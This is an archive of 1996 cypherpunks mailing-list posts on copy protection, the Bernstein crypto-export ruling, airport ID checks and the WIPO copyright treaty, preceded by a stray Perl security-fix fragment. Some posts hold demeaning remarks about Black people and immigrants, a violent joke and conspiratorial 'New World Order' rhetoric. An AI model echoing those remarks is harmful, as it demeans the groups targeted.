  	$pass = &getpass ($x);
+ 	if(!-O $ps) {
+ 		&error ("Secrets file exists and is owned by another user\n");
+ 	}
  	$status = &decrypt_secrets ($ps_pgp, $ps, $pass);
  	if (!-s $ps) { unlink $ps; }
  	$done = (!$status && -e $ps);













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott V. McGuire" <svmcguir@syr.edu>
Date: Fri, 20 Dec 1996 18:41:42 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Executing Encrypted Code
In-Reply-To: <l03010d04aee0d88d1498@[204.57.198.5]>
Message-ID: <Pine.LNX.3.95.961220213134.300B-100000@homebox>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Dec 1996 aaron@herringn.com wrote:

> >At 1:29 PM 12/20/1996, Bill Frantz wrote:

... stuff deleted ...

> >I would expect software prices to drop because everybody using the software
> >would be paying for it.  I would also expect more kinds of software to become
> >available.
> 
> I doubt it- if everyone has no choice but to pay, why would software companies
> lower prices? What would happen is a) less pirated software floating
> around, and
> b) software companies make much more money. I don't see prices coming down.
> 

You should expect software companies to make more money and for prices to
come down.  Remember, there's not just one software company.  This scheme
would force some of the people who would copy software to buy it,
increasing the profits to the software companies.  So, why would the price
come down?  Well, because of the increased profit margin, there is now
room for the price to come down, and since there is competition among
software companies, at least one of them will lower prices for the
advantage it will give them.  The others will have to follow.


>
... rest deleted ...
> 

- --------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMrtORd7xoXfnt4lpAQFNkwP+PJ8qq267S15H51i8dGqBFZEp2SC13+Xo
4h95n2fsunSWK/hQbmEXF8wZXabDqqXqRbCYh0ZZZy5Xz74vNoI4HaKsArs+dTgW
+Iu5EYM1cEK8Ncrr0o6kQSPiNproNZ944AuzD11X9vKMRAkxkxPD98XeBXn6SOFK
EAgm6Z0d9Cg=
=RiYt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 20 Dec 1996 22:47:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FWD: PGP-fone Mailing List Archive
Message-ID: <1.5.4.32.19961221063434.003e18cc@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>reachable off the PGP Fone Registry, but the exact URL is :
>	http://pgp.rivertown.net/pgp-fone/archives

Actually seems to be http://pgp.rivertown.net/pgp-fone/archive/


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#     (If this is a mailing list, please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 20 Dec 1996 22:51:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <1.5.4.32.19961221065041.003d70c8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 AM 12/20/96 -0800, Tim wrote:
>At 1:22 AM -0800 12/20/96, Vangelis wrote:
> >Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> >against policy.  Anti-terrorism policy and all.. it's for your own
> >safety, of course.
>At the risk of undercutting Bill's facetiousness, this was of course
>precisely his point.

Yeah.

I've spent most of this year going around North America on airplanes a 
couple of times a month.  Sometimes they insist on government ID, claiming
(falsely) that it's a government regulation.  Other times they insist
on photo ID (probably correctly) claiming it's a government regulation
(usually I fly electronic-ticket, which they ask for photo-ID for,
and I don't mind that.)  United is almost always satisfied with my 
employee-ID and the credit card I used to buy the ticket with,
except that they don't bother telling curbside baggage-handlers that.
And that's not even counting the "You must turn on your laptop" crap.

And it's PRO-terrorism policy "Be afraid!  Be very afraid!"
It's just not something a civilized place would do.

(Of course now that Ted "Accused Unabomber" Kaczynski is in jail,
the Olympics are over and it's pretty obvious that TWA 800 exploded due to
bad design//////////natural causes, they really _ought_ to either
give our civil rights back or else find some other excuse for it,
like "heavy Christmas traffic is an attractive target".  But instead
they've got announcements about "suspicious packages should be reported
to security checkpoints immediately" and "cars parked in the Red Zone
will be towed away and detonated".)

At least they weren't doing most of this paranoia when I visited my
sister earlier this summer, bringing a couple pounds of Silly Putty
in my luggage as presents for her kids, packed near the alarm clock....


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#     (If this is a mailing list, please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dalban" <orbeck@istar.ca>
Date: Fri, 20 Dec 1996 22:14:24 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Executing Encrypted Code
Message-ID: <199612210614.BAA25984@istar.ca>
MIME-Version: 1.0
Content-Type: text/plain


Scott V. McGuire wrote:

> You should expect software companies to make more money and for prices to
> come down.  Remember, there's not just one software company.  This scheme
> would force some of the people who would copy software to buy it,
> increasing the profits to the software companies.  So, why would the
price
> come down?  Well, because of the increased profit margin, there is now
> room for the price to come down, and since there is competition among
> software companies, at least one of them will lower prices for the
> advantage it will give them.  The others will have to follow.

And therefor I write:

	Of course that would be in a microsoft-less world where there wasn't one
company who controlled huge market shares, who dominated the industry and
who didn't have both government and 'big business' in their pocket. 
Microsoft is the great 'teflon corportation' able to shake off controversy
after controversy regarding everything from hostile marketing strategies to
product dumping.
	Since Microsoft already maintains a virtual monopoly I don't see how
making the user pay will serve justice.  In your world we'd have to pay for
whatever inferiour product is handed to us... not only limiting our choice
and freedom but making Microsoft that much more powerful.
	
My two bits, take it or leave it.

Dalban




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 20 Dec 1996 23:10:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <v03007801aee10fd61030@[207.167.93.63]>
Message-ID: <199612210710.XAA23943@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> Yeah, Matt, in a free society I wouldn't have to "speak Ebonics."

> If I were designing a genocidal program to destroy the colored race, I
> would be pushing for Ebonics, for encouraging coloreds to study "Human
> Potential" and "African History" instead of math, science, and engineering,
> and pushing for hiring quotas.

When I read Tim's original message on "Ebonics", I thought it was one
of those witty parodies he occasionally comes up with.  

Then I turned on the NBC Nightly News, and lo and behold, "Ebonics" 
was one of the featured stories, replete with commentary by former
New York mayor Ed Koch. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 20 Dec 1996 20:20:34 -0800 (PST)
To: hal@rain.org
Subject: Re: Executing Encrypted Code
Message-ID: <961220231956_575725076@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-20 19:54:09 EST, ph@netcom.com (Peter Hendrickson)
writes:

<< 
 > I believe this is a pipedream.  As it stands now, virtually all of the
 > software that requires special hardware dongles is ridiculously expensive,
 > even compared to similar offerings from other companies. >>

Well.... it seems to me that if the software is going to be so expensive..
that would THEN motivate to put dongles on.. seeing as these are the hardest
to crack.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 20 Dec 1996 20:26:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <961220232541_676355232@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-20 18:51:28 EST, you write:

<< How about the extra hard drive space you have to purchase because you
can't  
 just keep one copy on a server anymore?  >>

Well... considering most apps for client server (on the client machine) arent
_huge_ (memory is so damn cheap anyway)
Why on earth(forgive me if I am truly missing a point here)  would you put
all the copies on the server?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vangelis <vangelis@qnis.net>
Date: Fri, 20 Dec 1996 23:58:39 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <aak0yD25w165w@bwalk.dm.com>
Message-ID: <32BB9372.78B0@qnis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> > Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> > against policy.  Anti-terrorism policy and all.. it's for your own
> > safety, of course.
> 
> It's funny that this particulae piece of fascist regulation was imposed
> by the Klintons after the TWA 800 crash. Now the most likely reasons for

Um, not it wasn't.  Not that I wouldn't put it past them, but I read a
1st-hand account of someone having this problem months before TWA 800
took a bath.
-- 
Vangelis <vangelis@qnis.net> /\oo/\
Finger for public key. PGP KeyID 1024/A558B025
PGP Fingerprint AE E0 BE 68 EE 7B CF 04  02 97 02 86 F0 C7 69 25
Life is my religion, the world is my altar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 20 Dec 1996 23:55:10 -0800 (PST)
To: cryptography@c2.net
Subject: Reflections on the Bernstein ruling
Message-ID: <3.0.32.19961220234518.006a1ef4@law.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



(Please keep in mind that I'm not a lawyer yet, and that my comments are
intended only as the reflections of an amateur and are intended as
discussion fodder, not legal advice.)

Folks seem to be very excited about Judge Patel's ruling in the Bernstein
case - and with good reason. It was, for example, a first-page
above-the-fold item in both of the Bay Area's legal newspapers today.
Unfortunately, most of the media reports have done a poor job of
interpreting the ruling, and it's easy to draw bad conclusions from erratic
news reports about the case. The decision is available online
<http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/961206.decision>
thanks to the folks at EFF. I thought list members might appreciate a
summary of the decision and its potential effects.

1. What the ruling said

In brief, Judge Patel ruled that Category XIII(b) (the category which
refers to cryptographic equipment/software) is unconstitutional because it
functions as a prior restraint upon speech without providing important
procedural safeguards which are required when a prior restraint scheme is
put into place. She ruled that the "technical data" provision of the ITAR
is also unconstitutional when it refers to technical data about Category
XIII(b) items because of the lack of procedural safeguards.

Mopping up other points raised by the suit, Judge Patel ruled that the term
"defense article" as defined in 22 CFR 120.6 should be read to elide the
phrase "or technical data"; and that when interpreted that way, the terms
"defense article", "defense service", and "technical data" are not
unconstitutionally vague. She also ruled that the term "export" is not
unconstitutionally vague, and writes (in 'dicta', which is legalese for
"offhand comment", e.g., without precedential value but interesting as a
hint re what's going on in the judge's mind) that placing software on an
"Internet site" which can be accessed from a foreign country is an export
for ITAR purposes.

She also ruled that the "fundamental research in science and engineering"
(120.11(8)) and "general scientific, mathematical, or engineering
principles" (120.10(5)) exceptions to the definition of "technical data"
are void because they are too vague. As far as I can tell, they are thus no
longer available to potential ITAR defendants.

2. What the ruling didn't say

Judge Patel declined to address the merits of two of Bernstein's arguments:
that cryptographic software is independently worthy of First Amendment
protection as a tool which enables confidential speech and privacy, and
that the ITAR scheme violates the Administrative Procedure Act.

She also refused to grant Bernstein a preliminary injunction which would
have prohibited the US Government from prosecuting him for teaching his
class this spring, because her ruling means that his proposed activities
are not (for now) illegal.

The opinion also narrowly fails to say whether or not Category XIII(b) is
content-based or content-neutral; but reaches its conclusion by pointing
out that such a determination isn't necessary, because even if XIII(b) is
content-neutral, it is still unconstitutional. (* My reading of the opinion
diverges from the EFF's, as reported in their 12/17 press release, on this
point. I think my interpretation is correct. YMMV.)

3. What the ruling means

Some messages that I've seen have suggested that her ruling means that the
ITAR does not apply to crypto of any kind; or that crypto can now be
exported in, variously, the Ninth Circuit, or Northern California, or
Berkeley. Strictly speaking, Judge Patel's ruling is not binding precedent
in any court. The doctrine of "stare decisis", which says that courts
should not disturb existing precedent, suggests that other district courts
in the Northern District of California will follow Judge Patel's ruling, at
least until the Ninth Circuit addresses the issue (in this case or a
different one). But "stare decisis" is a policy statement, not law; and, as
the decision in _Karn v. Dept of State_ makes clear (by ruling that the
First Amendment does not prevent applying Category XIII(b) to source code),
district courts around the country are free to disagree with each other and
issue contradictory or incompatible opinions. (I'm interested in any
analysis which would suggest that her ruling is binding on the ND CA courts
for reasons other than stare decisis; I'm not aware of other grounds, but I
don't know everything, either. Comments?)

Further, Judge Patel's ruling yesterday is dependent upon her earlier
ruling which held that source code is speech for First Amendment purposes.
That ruling has not yet been reviewed at the appellate level, and is not
uncontroversial nor universally accepted. If another court disagrees with
that ruling, Judge Patel's otherwise convincing reasoning in this case
(which says that the lack of procedural safeguards for this prior-restraint
scheme is unconstitutional) is irrelevant - because without speech, the
First Amendment (and its hostility to prior restraint) isn't applicable.
It's also significant because her earlier ruling said that source code is
speech - and her reasoning for reaching that result does not apply to
object code or executables. 

It's also unclear that Judge Patel's ruling is enough to make export of
crypto source legal by people/organizations located even in the Northern
District of CA. Venue is proper, in an ITAR case, in any jurisdiction which
the defense articles have moved through. (18 USC 3237(a); _US v. Durrani_
659 F.Supp 1177, 1182 (D. Conn, 1987); an easy analogy is to the _US v.
Thomas_ "Amateur Action" case, where Tennessee venue was proper for
prosecution of California defendants who sent porn into Tennessee.) So it's
at least arguable that the feds could simply bring an ITAR prosecution in
another district, if exported crypto flowed through that district. (But I
don't think they can do so against Dan Bernstein because of "res judicata",
a doctrine which says that once two parties have fully litigated an issue,
they cannot come back to the same court - or a different one - and ask to
relitigate the same issue.) 

So while the ruling has considerable historical, cultural, and symbolic
significance, it's dangerous to assume that it means that export
restrictions on crypto are dead.

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 20 Dec 1996 23:07:45 -0800 (PST)
To: aaron@herringn.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <l03010d01aee0aea83b39@[204.57.198.5]>
Message-ID: <961221.001131.4o2.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, aaron@herringn.com writes:

> Flew down to LA recently with a firearm (checked, of course).
>
> Looking over the ticket later, I was mildly surprised to find "GUN" in
> a string of otherwise unintelligible text.

Probably a coincidence.  The last time I flew with a checked gun was
1980.  Back then, they just asked you to declare it.  In fact, I forgot
to declare it in Seattle, and in a fit of concience told a ticket agent.
Whereupon I was given a most nifty tour of the bowels of Sea-Tac to show
an agent that the piece wasn't loaded and that there was no ammo in the
same bag.  Ah, the good old days...

> The carrier was Alaska Airlines, if it matters.

I've flown tens of thousands of miles on Alaska Airlines... they were
always very mellow about things other airlines seemed tense about.

> As far as the photo-id went, they didn't copy any data off it or try to
> authenticate, just made sure it was my picture.

One more quick anecdote:  Back in January, I happened to be "between
picture id's" and needed to fly.  I showed a 2 year expired Alaska
driver license.  The clerk had a tough time finding the DL number (I had
to show him where it was), but didn't even notice the expiration date.
He did copy the DL number into his terminal, though.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMruBQBvikii9febJAQGl+gP+LhOd+D6o+e8wwyLVncNuk7FMkbOjCxjF
OS4ifNLCOwPrMnZySfGOinMdf+bmEzC1vdBjHmw0oqEr4A3P2uMZtayrj07Y2MBG
phzc+HuNgXrs7I4qXP5WFq50ZJVQpS/4sPwlbND/oF5HwxWql/JwnOIuyTIwR/Rd
HL4SBUoPWqU=
=RnxJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sat, 21 Dec 1996 03:17:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Flying on planes without ID
In-Reply-To: <32BA5ABE.64F2@pnis.net>
Message-ID: <32BB9E87.2BBD@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson wrote:
> 
> Rich Graves wrote:
> > "My wallet was stolen. The only ID I have on me is my ACLU membership
> > card and my PGP key. Can I still get on the plane?"
> 
> Rich,
>   How about, "I have copies of the eMail I sent, as 'fuck@yourself.up, can I
> still get on the plane?"
>   Let's hope that the security guard is a CypherPunk.  Maybe he'll let him
> 'off' the plane at 30,000 feet.
> -
> Reply to:toto@sk.sympatico.ca
> "There's only one two."

-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Sat, 21 Dec 1996 00:48:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Solidarity with Peruvian Guerrilla!
In-Reply-To: <v02130501aee03559777a@[136.152.11.117]>
Message-ID: <32BBA49E.247F@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


I said:
> 
> Aaron wrote:
> >
> > P.S. Plans are being made for a demonstration at the Peruvian
> > Consulate in San Francisco, California -- probably on Monday,
> > December 23. If you live in the area, please send me an e-mail
> > message.
> 
> Done.
> 
> This could be a real blast!

In case Aaron isn't the only one who was confused, the above is called 
sarcasm. No pun unintended. But for what it's worth, I've been told that 
the fun runs from 4:30 to 6 PM. The address is 870 Market St., near 
Powell, in S.F. Unfortunately, I'll probably be headed out of town by 
then, but say hello for me.

If you thought Dale was wacky, wait til you get a load of the 
senderistas.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Fri, 20 Dec 1996 17:41:46 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Life with Dale
In-Reply-To: <199612201454.GAA26329@mailmasher.com>
Message-ID: <199612210144.SAA25029@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199612201454.GAA26329@mailmasher.com>, on 12/20/96 
   at 06:54 AM, nobody@huge.cajones.com (Huge Cajones Remailer) said:

::>From: Dale Thorn <dthorn@gte.net>

::>I spent part of my growing up years in Leroy West Virginia, pop. :about 15,
::>give or take.  I know about hillbillies, and I know about guns.

::>If you had the impression I am a whiner, or that that defines me as a
::>person, you're about as clueful as the other old farts who attack people
::>they don't know anything about.

::Name one thing Dale has not experienced.

  ==
  "When buying and selling are controlled by legislation, 
    the first things to be bought and sold are legislators"  
        --P.J. O'Rourke.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrtAFb04kQrCC2kFAQHwdgP/XgRcqqSyHjBIeD3Qd6zpPynqlzWYogLb
yxaiRpI80WdE+OvAjLNAMb+GOFET3lfdtDmfgGKEOpKK4oMWLFhojA4ZorDm6KXh
0o5qSqNThrg/8xpZGRRni1f363GIA8UWz6mCeUTGgS6FLFuvbheEmTYSS1wSnV9P
H18Oq9i7M2U=
=yiar
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Sat, 21 Dec 1996 21:55:19 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Life with Dale
In-Reply-To: <199612201454.GAA26329@mailmasher.com>
Message-ID: <199612220557.WAA00880@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199612201454.GAA26329@mailmasher.com>, on 12/20/96 
   at 06:54 AM, nobody@huge.cajones.com (Huge Cajones Remailer) said:

::>From: Dale Thorn <dthorn@gte.net>

::>I spent part of my growing up years in Leroy West Virginia, pop. :about 15,
::>give or take.  I know about hillbillies, and I know about guns.

::>If you had the impression I am a whiner, or that that defines me as a
::>person, you're about as clueful as the other old farts who attack people
::>they don't know anything about.

::Name one thing Dale has not experienced.

        LIFE?

  ==
    Tyranny Insurance by Colt Manufacturing Co.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrzM2L04kQrCC2kFAQH+fAQA06vGSZgkryR+DtBS/6CJq5vS6pB0Cjwx
EAavs2fOLRxI1RYuIcrv5znqFXR65lkjUl9ZCKAzds4XOT8n8as+BfW8YB5Qa2Lp
8yYA6kaxHD8leyO4PfJ4CIS06nBlsjgeJHeUo5qUOJc1INGnCA9OlrodrgAjqBvB
hanXjoQw+Jo=
=ZgHt
-----END PGP SIGNATURE-----
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sat, 21 Dec 1996 05:32:42 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Slaughter
In-Reply-To: <aVL0yD28w165w@bwalk.dm.com>
Message-ID: <32BBF98E.4D51@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> 
>               CORPSES LITTER HILLS IN KARABAKH

Dear Dr.DVK,
   Thank you for your lengthy list of articles on the human slaughter
that continues on earth to this very day.  It reminds me of watching
the TV coverage of Desert Storm, as the news channels took great
delight in replaying scenes of American flyers massacring retreating
Iraquian troops who were beaten and bedraggled, merely trying to 
survive, and get home to their families.
   Basically, they were slaughtered so that the flyboys and their 
superiors at the Pentagon could test their new toys, and make sure
that they worked.
   It was considered acceptable action, however, because these were
the 'bad' guys.  We 'know' that they were, because we were told so by
the ten-second sound-bytes of the New World Order during the nightly
news.  So I listened as millions of Americans cheered the slaughter
of defeated troops, who had thrown up the white flag and retreated,
only to have us blow them away from out of the sky on their way back
home with our wonderful hi-tech weapons.
   I listened as thousands of Americans, including the media, truly 
bought into the Pentagon sound-byte that tells us the world is a
better place because we can slaughter the soldiers of less-developed
countries 'from a distance', using technology, and not 'risk' precious
American lives.  Of course, missles don't take prisoners, so everyone
we make war with has to die, now, don't they.

   Remember that this is the same Pentagon that built the InterNet.
And the same Americans who cheered the slaughter of defeated troops
will be lined up to cheer the slaughter of the misfits among us who
are culled from the herd through the tracking of their activities 
and their communications on the InterGlobal communications system 
of the New World Order.
   While the vast majority may be enthralled with their pretty, shiny,
new toy--the InterNet--and buy into the sound-bytes that portray it
as an empowerer of the common man, there are others who have, since its
inception, been warning of the 'dark side' of the InterNet.
   When the New World Order becomes a reality, the main difference 
between the next holocaust and the last one will be that the misfits
and outcasts will have GameBoys to play with during their trip to
Auschwitz.

   There is a quote I remember which struck me deeply when I heard it,
but forgive me if it is not quite correct:
   "They came for the Jews, and I wasn't a Jew, so I didn't speak up.
They came for the National Socialists, and I wasn't a National Socialist,
so I didn't speak up.  Then they came for me.
   "And nobody spoke up."

   I don't know Phil Zimmerman.  I've never met him and I'd never heard
of him, or of cryptography until the fledgling New World Order began
their crusade to start culling out the misfits who stuck out glaringly
from the common masses by trying to provide them protection from
Big Brother and his goons.
   I didn't know Phil Zimmerman, but I knew his psyche and I knew his
motivations.  You might say that we went to different high-schools
together.  So I spoke up.  Loudly (and anonymously).
   And by the time the sun came up the next morning, bleary-eyed and
tired, I had a copy of PGP on my hard drive.  I had a weapon of
self-defence in my possesion that Phil Zimmerman shed his blood for,
at the hands of the New Pharisees.
  You are free to rail night and day against cryptology and cypherpunks,
and whoever else it pleases you to rail against, because this is America.
But believe me, America is, and will be, a part of the New World Order.
Phil Zimmerman's case was not an 'aberration' of 'what is', it was a
foreshadowing of 'what is to come'.
  But there are others, with more foresight, who rail against the real
threats to mankind, and to freedom, and they do quietly, and in secret,
not wanting to share the fate of Phil Zimmerman and others, who had
too high a profile for the New World Order to ignore.
   These people are not psychic, but they have the foresight to see the
future in the shadows of the past, and they will tell you, man, woman,
and child,
   "You will take my cryptography from me when you pry it from my 
cold, dead algorithms."

   So, Dr. DV K, rant and rave as much as pleases you, but be careful
what you rave against, lest they come for you.
   And if you feel the net tightening around you, with the forces of
the New World Order hovering over you, deeming that now 'you' are 
becoming a problem, then think about protecting yourself.  Think about
cryptography.

Kindly,
  Toto

p.s -- If you are going to quote 'news broadcasts' from the BBC, etc,
then please don't quote the same 'bad syntax' in three consecutive
news releases.  i.e - "shot dead from their heads"
   It might give some people reason to wonder if you are authoring
these 'news broadcasts' yourself.
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Sat, 21 Dec 1996 04:12:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dale defends free society from the NSApunks (was Re: Encryption ?
Message-ID: <199612211212.HAA13448@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


:There are a lot of NSA people here on cypherpunks, and they try very
:hard to control encryption, to make everyone think it is difficult, to
:discourage independent inquiry.

They don't have to discourage anything, we never talk about encryption here.....
But thats the master plan, to bore them into leaving!!










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 21 Dec 1996 07:14:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks
Message-ID: <199612211514.HAA26831@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


:Date: Fri, 20 Dec 1996 14:10:11 -0800
:From: Rich Graves <rcgraves@disposable.com>

:Stop bashing Dale, you ADL/CFR/NSA thought police, you.

I can recognize sarcasm!

You're on the list! Yes, THE list!

Yours from NSA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 21 Dec 1996 07:31:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <199612211531.HAA29766@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


:From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)

:Why is the fascist United State of America considered a "civilized :country"?

It lets in the refuse of the earth to offer them the opportunity of a better life? With little guarantee thay will repay the offer?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 20 Dec 1996 23:52:51 -0800 (PST)
To: Michael Tighe SUN IMP <michael.tighe@Central.Sun.COM>
Subject: Re: Bernstein (export laws unconstitutional) decision update
In-Reply-To: <199612201536.JAA15195@jeep.Central.Sun.COM>
Message-ID: <Pine.LNX.3.95.961221074912.234A-100000@batcave.intrex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Dec 1996, Michael Tighe SUN IMP wrote:

> John Gilmore writes:
> 
> >After further consultations with the attorneys, we are not sure
> >whether the decision has nationwide impact or whether it is limited
> >to the Northern District of California (which includes SF and Silicon
> >Valley).  Your Mileage May Vary -- check with your lawyer.
> 
> The decision itself says it only applies to Bernstein, and then only for
> source code.
> 

The fact that one judge says his ruling only applies to one person is
irrelevant ; his decision can, and probably will, be used as precedent in
other cases, which is the good that it really serves in the first place.
More power to Mr. Bernstein and all, but in reality this case has almost
nothing to do with him in particular.  The real usefullness of this case
is so that other judges can see that at least one judge believes that the
law _can_ be wrong, even if only in specific cases.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Illusion is the first of all pleasures.
		-- Voltaire


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMruXCjCdEh3oIPAVAQFaUQf+MBMdFxn51Sw2ERB0MNrlDTDspS3mAVlZ
n1H50kNRjO6sgZjZPDZzG4iZmGc0seDTW18tqQSD0moDDlWBZSUemT3mGsJhp6MO
aTpC93aflIXU+SuTjYsNbDU9PfSflPiqo/+2IIbNXgRpCWJ1+lyO09U8tW0iMPp+
u5yOLMkfnTvyDoJPpygsAY7SKpjJ6hYDg6RKifGrOuWML6F/0RzEJwvXAYBw264H
5NRvfNKue0Sa8WhfMTfqplcw8m2IkMj8PLsqTWEXOQv+xSxUU0iTVKrCCNjwM3zM
tZnKwe0sBKpl2Mrne1jFR3ylun7adDpkyxJEhJhs2gFW1UZ6CYMJug==
=syTX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 21 Dec 1996 05:40:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: WIP_out
Message-ID: <1.5.4.32.19961221133655.006abbc8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-21-96. NYP:

 "Global Agreement Reached To Widen Law On Copyright"

 On-Line Material: International law would specify that
 copyright protection includes the right to control the
 on-line distribution of copyrighted materials, as well as
 the right to prevent others from making unauthorized
 copies.

 "Fair use" -- the tradition of allowing individuals to make
 a limited number of copies for noncommercial purpose, or to
 use brief excerpts in news reports or artistic criticism --
 would still apply in cyberspace.

 In a compromise meant to defuse one of the harshest
 criticisms of the treaty, negotiators agreed to delete
 language that would have treated even temporary copies of
 material downloaded from the Internet as possible
